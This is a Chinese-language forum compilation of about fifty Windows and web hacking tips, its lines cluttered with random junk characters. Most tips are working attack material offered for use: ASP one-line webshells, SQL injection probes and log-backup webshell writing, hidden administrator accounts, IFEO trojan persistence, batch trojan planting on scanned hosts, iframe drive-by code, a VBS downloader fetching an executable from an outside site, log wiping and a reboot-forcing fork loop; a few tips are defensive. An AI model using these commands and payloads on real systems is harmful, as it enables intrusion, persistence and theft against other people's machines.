Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
, k* r! k5 j2 h# X* v& b4 tcacls C:\windows\system32 /G hqw20:R' a& K, m( G. o. M
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入$ V! Y: i4 M9 b6 C2 L6 K
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
& I# {/ |& M8 C3 q5 d, V6 y* |: }/ p
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% ^. _9 r' x+ B& _% \2 y) F+ y/ o9 V0 u( N1 E7 E* m: S$ C# E
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。. v5 [9 t$ S6 E6 q7 [
. A2 s& j( Z9 @7 x6 @3 p2 X! u
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号5 n" a' C9 h1 a8 @6 ]
4 S. U8 s) k o, [! t$ o
5、利用INF文件来修改注册表+ G- @" B Z5 y9 Z
[Version]+ r$ U- b- \% ?- | p! P
Signature="$CHICAGO$"
) l7 e* S5 l' [# D9 w1 l[Defaultinstall]
: |! C! r6 {) a7 Y8 v" PaddREG=Ating
3 O4 F6 O% B3 }) [8 E[Ating]
~; Y% `6 o& |4 e& HHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
- s& D' D# ]4 w( ?- C以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
5 V% f, E. j6 C' drundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
r& _% d9 ]6 o其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU: T: K+ t0 ?& B1 J1 C7 |) B
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
" W: A; N" w# V8 ^& FHKEY_CURRENT_CONFIG 简写为 HKCC: ^. [' W5 L' {' g6 P2 _/ u7 L
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值8 s* K& ~# A3 z2 Q- z! M
"1"这里代表是写入或删除注册表键值中的具体数据
% ~, e# @' z/ x$ \: d" n% ^- n5 R. ^( E( E) }
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
. T& P8 |, {* ^多了一步就是在防火墙里添加个端口,然后导出其键值
0 }& `/ r/ C- w[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
' E; R1 b3 V( A2 J# @
( H3 g$ }1 h* p- b9 V3 h7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ r; k. j7 g. T5 y% R
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
7 `) ] f$ h- k$ l) l6 j6 u- B' P& Y' C$ j6 s# G; {0 Y7 |& d8 h
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
4 w/ ~7 j6 S' B: Y# P
* [3 u' g; C2 D( M9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,4 H$ F6 v/ _7 O# B& A9 r
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。4 f; @/ [% L# H i6 F' t
- C7 f$ U4 g" L( [! i% x10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”3 o* b: |) t& ~; z7 B/ X2 ^! S
1 d- s o7 C0 X: H( \
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,: v# Q# _, P2 @+ v5 }' {
用法:xsniff –pass –hide –log pass.txt% j3 K1 Q$ {: l( t' a2 O5 U& B
- I/ A, O! U& @* J- o
12、google搜索的艺术8 @ P6 J3 N2 U" e
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”& {2 r( ^; b- K- y# P; H
或“字符串的语法错误”可以找到很多sql注入漏洞。
0 {2 O' V3 c0 H
) f8 K; l& Z( S13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。- ]. s7 n$ d, |+ d
6 d2 c0 e# r& ~ h% w
14、cmd中输入 nc –vv –l –p 1987( S1 ]; T9 t- M+ |
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 K, \: P: i1 r
$ T+ @* g5 N% a6 P- p: `& i
15、制作T++木马,先写个ating.hta文件,内容为
: p, q) K1 l" [% X9 W& J<script language="VBScript">" C- |) o1 u h) s" V" P+ b
set wshshell=createobject ("wscript.shell" )* E5 I* K2 Y+ N* D$ `, n8 Z
a=wshshell.run("你马的名称",1)
" b- T& P7 i1 ?# _+ ]window.close9 {+ p% W2 ?- S9 {4 d
</script>
. w1 i: v9 m! [5 [再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
+ [0 t4 w; \7 p# z0 U/ v' W2 x2 a+ {) _6 j0 _. V6 Q+ C- }+ Z, s
16、搜索栏里输入
. y2 j: n$ P; Y- v4 ?1 C5 M关键字%'and 1=1 and '%'='
& k7 c" Z8 P& w7 p关键字%'and 1=2 and '%'='
4 A9 f5 d3 B5 u: X" i比较不同处 可以作为注入的特征字符
/ J6 Y1 c( Y9 a5 n- P
0 r& L$ U; a8 f# e' k17、挂马代码<html>
4 B0 `6 `# {1 i' I- r<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
( t; p R9 z4 V# J7 n) {- J</html>% R/ Q( S- \/ Q# K! U
& D G% n0 I) I- j
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 g! W3 g9 G* ~5 pnet localgroup administrators还是可以看出Guest是管理员来。4 ]1 l9 d( _( K. l" M! I& G
: l2 `) a* s9 f% R2 c
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- `8 V/ L9 }( P3 ^
用法: 安装: instsrv.exe 服务名称 路径( u2 m+ g7 N# n0 O. ?- t
卸载: instsrv.exe 服务名称 REMOVE& s* I& d( ?9 s2 J, m8 J9 ?
: |( D& H) f# u( g( j
' K. j3 B9 c9 ^/ z21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉# i1 O; A! Y- m& [: i8 x% C- N# K
不能注入时要第一时间想到%5c暴库。
4 y6 ~# k- j0 G# C; t2 Z r6 O
1 u3 u1 F& |# P1 Y9 U$ y22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
) Q- c6 W% H$ u1 r; R9 c0 i# P
! z8 h" C. e+ z# q! L0 c23、缺少xp_cmdshell时1 J9 h }- a: v0 H) p+ m
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll': Z" N+ j- g/ u& r* Y7 k3 |( ~* s
假如恢复不成功,可以尝试直接加用户(针对开3389的)) C( n/ m; i. A5 k# N
declare @o int
: H: S1 L* S' f, }) S+ [3 H+ aexec sp_oacreate 'wscript.shell',@o out
0 y, o% }4 Q' T/ ]. Bexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 |/ r" F; J* w3 r7 A8 s# T, `4 f1 V7 c; R
24.批量种植木马.bat
$ l: ?: W+ _) g& d% ?! p/ Ofor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中; I y" N0 s! M
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# @7 T: d% O8 ]# K. d4 x4 b0 N" s
扫描地址.txt里每个主机名一行 用\\开头/ r- [4 K9 R/ R$ ^* \+ x( F
/ U7 I5 [" D& s1 ^3 q: A
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 j& P- x7 |; x! Q2 e& o- M) j7 ]
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.' s _, B3 X+ |8 M% \" y' A
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.) o+ `: U, r+ e
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马* H- J1 }3 n! G9 z' e+ ]8 M
0 `" Q/ w* m2 [* c) W( t& N$ ~' F
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP7 [, j( d: @% V7 I. p# \
然后用#clear logg和#clear line vty *删除日志% ^- [+ |1 D4 \5 e7 d
9 ^: r6 z- t, \/ C
28、电脑坏了省去重新安装系统的方法
! v1 L! e8 }# \1 f$ ]纯dos下执行,- M9 w" a0 Y, g! r% ^
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
6 l2 n; K# ^7 U7 R! _- @5 r. p6 e2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
( w6 Z( a7 g7 Y5 j+ {9 w( k1 w( f5 d& A4 k
29、解决TCP/IP筛选 在注册表里有三处,分别是:4 K- j( v; v( V
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
7 ^1 H1 O# s+ w' I& {( hHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- U6 r! _+ v* w# u( @# o5 c V( `
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# g9 f3 x0 Q( r/ \1 V分别用: T1 \. r! i! k7 \# {) [
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 _7 Q! j) p5 @ P- J2 { R, {
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 `/ F5 b' G% j7 k! aregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' |* x( c' u- u y( [( B* I
命令来导出注册表项
; o, |' s# i! x" C/ U然后把三个文件里的EnableSecurityFilters"=dword:00000001,$ H$ u+ F5 z/ c1 h& C# ?: a0 c
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
, r( ]- x* c; n4 i$ b4 T/ uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
8 k. R8 q0 k: I0 P5 P" O
3 |! S! K; E$ Z( d1 i2 c30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* n/ W9 f9 Q; |: y7 BSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
' e- j8 ]4 H `8 Q. n. t1 B
! b; d+ t6 n L, C4 x1 B s31、全手工打造开3389工具
$ O1 P, @! [, E打开记事本,编辑内容如下:& {; K! O/ n/ }/ w( o. G
echo [Components] > c:\sql
3 L: z2 I9 r5 H( S6 N5 [; {5 Recho TSEnable = on >> c:\sql/ I5 z! f C2 |! M
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q, x1 r0 x" ~* _6 |3 a2 U: o
编辑好后存为BAT文件,上传至肉鸡,执行* i# c( i. L. g& C
. V. V. t; |: I7 H32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
1 b3 m+ I# A# q& e0 V+ {" f4 u' T8 u, o( T" s
33、让服务器重启
( J9 o1 @" A( c2 M写个bat死循环:2 }* d+ P( k' ~) R$ O9 i" r
@echo off4 L9 P; ]3 M5 P; w
:loop1
! T$ P8 @( h& F% R( L% ^cls
7 r) ~: R! d1 F1 Lstart cmd.exe
; S4 A8 U$ ~# R. Ggoto loop1' K( H2 k6 I1 k
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
) y) e; g: e0 s8 x5 h3 q$ s) J2 V) T& R
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
" b4 o; l+ \3 W- H) j@echo off0 W* s U+ O$ z5 G* m: g7 V7 a
date /t >c:/3389.txt
: W0 b. ?7 o! l2 j8 B3 Vtime /t >>c:/3389.txt
+ Y& a. O4 u1 }7 r( `3 oattrib +s +h c:/3389.bat
' W8 S6 M, W& S& cattrib +s +h c:/3389.txt
4 ?4 w* ]" v {) v8 r2 xnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt! V f, s* ?. S% i
并保存为3389.bat6 y& w% g" B0 a$ o
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
$ S0 G4 O3 d/ d0 ~ Q' e: U. k0 ]5 P2 X
35、有时候提不了权限的话,试试这个命令,在命令行里输入:( D* m; a' Y! Q3 L& w. X
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
/ J, G i) e9 O2 I输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( ?9 A+ j" N" Y- ~& [; l4 a/ s- R* x2 x) _
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
+ X* U# H* x* {$ ? Z6 oecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址0 I+ F4 V1 [7 O; n/ L
echo 你的FTP账号 >>c:\1.bat //输入账号" }3 O/ x4 V# C8 P* R, H9 X
echo 你的FTP密码 >>c:\1.bat //输入密码
9 z6 U7 e" y0 S+ _! `0 Cecho bin >>c:\1.bat //登入
8 [1 E. q( }; e& necho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
# g R$ ]# z8 P! Necho bye >>c:\1.bat //退出
2 y" c# \' I9 v, t2 V" J8 N然后执行ftp -s:c:\1.bat即可" i1 U* l( N5 X+ d4 d' V& m! `
9 Q6 P; {' D. l1 U8 e37、修改注册表开3389两法( S' J6 {# X) K6 I, w
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表1 a" M1 ~4 G2 B% t% A' C: @2 j( c+ R
echo Windows Registry Editor Version 5.00 >>3389.reg' ], G0 _0 }4 w- C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
( w, _9 D0 k$ b4 recho "Enabled"="0" >>3389.reg
/ K$ u% Y( b4 }! m; h% decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
- d+ S% v0 L( v9 e$ n% ?7 jNT\CurrentVersion\Winlogon] >>3389.reg
& l% I$ {- y4 Pecho "ShutdownWithoutLogon"="0" >>3389.reg
; ?% M5 x# b7 U! Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]9 c0 ?& m9 @5 {1 i6 t( Q$ A$ s/ R
>>3389.reg
" k4 W+ |! w2 T) [1 P* Vecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg9 l s* Y. g% f' \ U9 P3 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+ a0 X* d, c0 Q9 d3 L>>3389.reg
3 s& Z; b m0 b. u8 F, f* h' B( Gecho "TSEnabled"=dword:00000001 >>3389.reg, B$ X! f, n6 E# @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg% Z: q+ t" l& k
echo "Start"=dword:00000002 >>3389.reg7 P& `9 V& \' z: s0 n6 p6 L" I: M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
. t) V, K) J9 }; ]3 ~/ I>>3389.reg
7 ?+ d4 P1 c& Q, vecho "Start"=dword:00000002 >>3389.reg
& e/ j6 J5 H! D9 X2 Y# \echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg5 D( J( z" Z8 y
echo "Hotkey"="1" >>3389.reg
2 J6 f$ A0 Y/ ]- necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: _1 d8 n- G. [# D
Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 }3 d( R* z$ \' \
echo "PortNumber"=dword:00000D3D >>3389.reg: i9 B( s+ \3 @; e. J+ U' K# P! V( Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Y5 q! f4 `1 k ^
Server\WinStations\RDP-Tcp] >>3389.reg7 d4 j$ N, g4 N1 d# |3 g
echo "PortNumber"=dword:00000D3D >>3389.reg& P E, @" F6 j; n+ U6 w# f( Q
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。$ q) ?# J7 e1 B+ I
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
7 O3 f% c, p$ X$ i( Z& a因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效) s; ^8 J9 r, z. J
(2)winxp和win2003终端开启
0 |5 n. R1 M. v3 _用以下ECHO代码写一个REG文件:) y2 Z* j( k1 T! \ N$ }2 p( J
echo Windows Registry Editor Version 5.00>>3389.reg
% o- U; N; @; g- L$ G }# N* s6 secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
I4 m/ \( j+ I6 S; b2 cServer]>>3389.reg* g, M, a0 g# v0 d' b' k4 ]
echo "fDenyTSConnections"=dword:00000000>>3389.reg
$ D2 X6 z( I5 ^" A- Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 Q6 L$ I8 J: I* G: |# F7 ?; Q
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
/ r: v5 s0 m# l: m# m7 gecho "PortNumber"=dword:00000d3d>>3389.reg$ C: C1 i! E& d# V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 z Z# M/ p) k7 T# UServer\WinStations\RDP-Tcp]>>3389.reg7 ^/ z' G$ p1 p
echo "PortNumber"=dword:00000d3d>>3389.reg
2 j: r \% L3 @, T0 Z; q, U然后regedit /s 3389.reg del 3389.reg
+ r5 t* R2 j* X3 SXP下不论开终端还是改终端端口都不需重启
# b3 p; U$ T: B+ a/ ^6 z
$ q" q: W: b+ c6 J/ b2 e38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃, Q2 B+ B/ g9 g$ l& x
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
" E$ `" w3 n- i/ [7 e& ^' x% w v: d
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!" C3 [7 s3 ^5 P; K& @; N( L! ^8 o. D
(1)数据库文件名应复杂并要有特殊字符+ g1 b) y2 \, v1 m% ^: d {8 i: U
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
/ m3 a! ^2 ]: M将conn.asp文档中的
/ V* [+ U" {/ k; F9 b, f: i1 WDBPath = Server.MapPath("数据库.mdb")
- J+ ~1 Y! I) F; Vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
+ t9 q! U) a+ G
9 E! J* n: d U# c' g修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
2 U+ }) E, r: h% o(3)不放在WEB目录里- T8 Z; I; v% V0 N% ?, q
* ^6 ?& [8 D o! A2 u- ~
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
2 Q+ q2 ]# U' I& Q* a可以写两个bat文件0 h( F# Y) x3 ~0 `
@echo off
7 W- D+ ]( P+ F: J) S% t@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, a w1 g" \1 ~6 _, _% `1 H- b@del c:\winnt\system32\query.exe
; M4 Q1 J* o# z! Z4 H; Y9 K@del %SYSTEMROOT%\system32\dllcache\query.exe8 y: h! {. c1 J" \
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的/ O" X, W% v4 C0 ^, ]4 \
2 t ]! h6 B6 l- c( R2 [* @
@echo off4 h K- D" [( t
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ `: G. }- C% D' t( S. D4 y@del c:\winnt\system32\tsadmin.exe
4 I5 V- c2 A( S3 y@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex, K1 s: ]% u* X9 e" J
# \3 `$ ^# z6 j$ W6 m
41、映射对方盘符8 a0 B' R2 G0 M4 I" e, n# q8 w Y
telnet到他的机器上,
2 T- S: ~# C1 C& N) enet share 查看有没有默认共享 如果没有,那么就接着运行
; l* W1 j" H, \1 ^8 {4 Gnet share c$=c:/ n, y% p. D; x' v/ z | V; W
net share现在有c$
. e. D9 D9 Y; Y: U在自己的机器上运行
# j! y; E# G7 o V2 A) b, P" Pnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K3 C! i6 G8 O, T5 C+ T6 y. p! m
8 X5 i2 h) K* {3 V& E& }8 I
42、一些很有用的老知识" H9 g4 w8 j A
type c:\boot.ini ( 查看系统版本 )9 V( U1 L( V, h) d7 k0 i x( s
net start (查看已经启动的服务)
. n& o" K, d2 p$ f* l% Oquery user ( 查看当前终端连接 )
/ C2 ~' a4 v. I8 O; j7 p- ^net user ( 查看当前用户 ); J& m! B; v- N/ y
net user 用户 密码/add ( 建立账号 )/ a: W) |% U& M* u) V
net localgroup administrators 用户 /add (提升某用户为管理员)
3 Z' u( h5 B8 T. ?+ o# g4 n1 X8 V; kipconfig -all ( 查看IP什么的 )
' x- g3 e) |& z1 P& C1 _% {8 `: K) N& snetstat -an ( 查看当前网络状态 )9 R) D# [+ L8 b' [6 J8 `
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
0 L* k0 {$ C( ?% A0 L克隆时Administrator对应1F4
" a7 g2 q; ]! Y* ^/ lguest对应1F5 T7 `/ }7 O" K4 f
tsinternetuser对应3E80 g( F9 w& l& D7 t3 [5 z
% s( j4 k$ r9 @% ~4 }
43、如果对方没开3389,但是装了Remote Administrator Service
' H7 | [, e% [9 r3 u6 w用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
. s' q C1 s3 B; S0 i6 R" W解释:用serv-u漏洞导入自己配制好的radmin的注册表信息; a! n1 V O. W6 m
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
1 p) c7 F: n8 g+ G, \4 w! R6 s0 H( g8 J5 @9 L1 d S$ h; v3 H0 e0 r
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)# i' \7 P ?+ J3 _+ d% G7 h
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
; v+ p( N; c, X# o
2 E: k I8 R& y, x; V* I45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
. o8 \6 c$ q& n+ Pecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open' g5 ^4 r' q+ \) H
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" M% t w1 R3 _. Y% j6 m! |CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
3 ~; w! H+ }- Y: m: E' D1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs% ?; z/ E) g: r8 M5 n. F
(这是完整的一句话,其中没有换行符)
5 ]) z+ l m) o' q$ `然后下载:1 t) D9 F6 i3 l4 e; q7 A
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 p8 U4 m2 ^+ _! I& c
" R3 r6 \1 i% g( r) z6 ^, B) H46、一句话木马成功依赖于两个条件:" A* E. E @1 @# d, I6 w" F
1、服务端没有禁止adodb.Stream或FSO组件
0 R6 z d& Z' j0 {! q7 L2 x ~2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 f7 y5 ^9 M7 ~# ]4 [
* o9 v) H/ g: x& G8 f% d47、利用DB_OWNER权限进行手工备份一句话木马的代码:
! C; X8 [6 i1 @/ X. B0 x: k% Y9 E: d;alter database utsz set RECOVERY FULL--) f- V/ c8 \6 G6 o0 G# I
;create table cmd (a image)--: \8 J; J: P9 k7 d, j
;backup log utsz to disk = 'D:\cmd' with init--) `# H7 T) A' t; H
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--9 R+ a- d+ B) M
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
& J0 N7 @" x: ^8 }3 N' O注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。- o, @; w9 L: h; n& @) u
! \0 s5 [6 o/ f) @6 \" X; ^2 O48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
i }; B) S; H: c# U$ D k! r. ^2 t+ h7 ?. E/ X
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ C4 k( Z# o( l' q& v
所有会话用 'all'。' B+ X8 V/ e l6 f3 ]* Q
-s sessionid 列出会话的信息。* j; d5 y0 h, [. s5 c3 i/ Z
-k sessionid 终止会话。
) A1 {- O! O9 O0 O-m sessionid 发送消息到会话。8 j. ^* c9 r! T: z! e
7 f+ z+ v+ u, L" ~! m
config 配置 telnet 服务器参数。
$ {: g$ P' @5 ?
" g' D! o& m4 ^& R2 e. l/ B/ xcommon_options 为:4 F& r2 F, v9 v& d/ T6 N
-u user 指定要使用其凭据的用户. f; y/ N2 r6 @, F l9 s" n
-p password 用户密码
" k# S# m! [- t; r2 Q( G/ v2 K, O2 C) `; k
config_options 为:
" J4 I. r. h# ^* \dom = domain 设定用户的默认域
$ k" k4 G$ L. S: ?+ \6 d) @ctrlakeymap = yes|no 设定 ALT 键的映射
0 U( V' n' x8 f: Z% [/ Stimeout = hh:mm:ss 设定空闲会话超时值
8 z+ z" A6 v! ?timeoutactive = yes|no 启用空闲会话。7 ^1 u9 A) e- |5 q8 n* C4 H5 V7 _
maxfail = attempts 设定断开前失败的登录企图数。0 g' l1 s h8 u' u5 g1 v
maxconn = connections 设定最大连接数。; R- y" o, p6 T1 s) Y
port = number 设定 telnet 端口。( g B, {1 U" Q4 T" O6 n
sec = [+/-]NTLM [+/-]passwd/ {( ?! [- ~& M
设定身份验证机构* v/ }: ^ M" H. Z$ C
fname = file 指定审计文件名。0 Z) n, g3 R+ w4 a
fsize = size 指定审计文件的最大尺寸(MB)。& [( }. c# t1 L! x3 ]8 \
mode = console|stream 指定操作模式。
7 h* D; l: W2 Z Y. k5 f- k @auditlocation = eventlog|file|both/ q* c, V( e( A* T
指定记录地点
* j: O* |5 f6 K- X G3 m# Yaudit = [+/-]user [+/-]fail [+/-]admin
0 ?/ Z; C" W4 C. Q. q" x5 s9 j+ ^' t6 ~/ o6 L0 L3 m9 h4 A
49、例如:在IE上访问:
4 [& l- w4 l9 s7 s% f I0 Wwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
9 O) S: P- _, {+ Dhack.txt里面的代码是:- D) K7 \( p; y$ z
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
" X @; }1 F6 E$ K, o( ?& u把这个hack.txt发到你空间就可以了!
0 P' M+ K, x. g& k3 Q3 N: d q这个可以利用来做网马哦!
G7 ^, v: o+ M$ k5 q" N$ { k S; R% f4 }* P) J2 J
50、autorun的病毒可以通过手动限制!8 K, Y; C( I# W, }" K; R) x
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( _+ D! o* u2 v0 Z- e8 j2,打开盘符用右键打开!切忌双击盘符~
% U/ p4 y/ Z2 p8 j& H8 q3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 x: L! e8 i) a0 _
8 @& e* ~; e% r6 ]0 U- R
51、log备份时的一句话木马:6 l: a1 p$ {1 k3 Q$ Y
a).<%%25Execute(request("go"))%%25>
7 U3 Q( s5 A( o9 o& q& `5 ob).<%Execute(request("go"))%>' k& \5 t$ H( |$ [6 `. [6 }
c).%><%execute request("go")%><%0 b# X. V) r9 i5 y, x$ [* \" N$ x
d).<script language=VBScript runat=server>execute request("sb")</Script>! f! L+ H7 [+ Q6 G
e).<%25Execute(request("l"))%25>9 U0 y9 J" G/ o0 L4 O, \9 {% E# G' Y
f).<%if request("cmd")<>"" then execute request("pass")%>
8 F: z; N/ R) s7 T2 I/ R! A3 D% l6 }; y0 N: J
52、at "12:17" /interactive cmd! w. [& P- t- i0 ?3 V
执行后可以用AT命令查看新加的任务0 A; H- @( \% q
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, u. Q; J" ~1 P; _# A0 f! @; x
: Y/ a0 C- G8 [* {! J) v
53、隐藏ASP后门的两种方法$ w8 d% `4 d) c0 Y k7 K+ v+ S
1、建立非标准目录:mkdir images..\
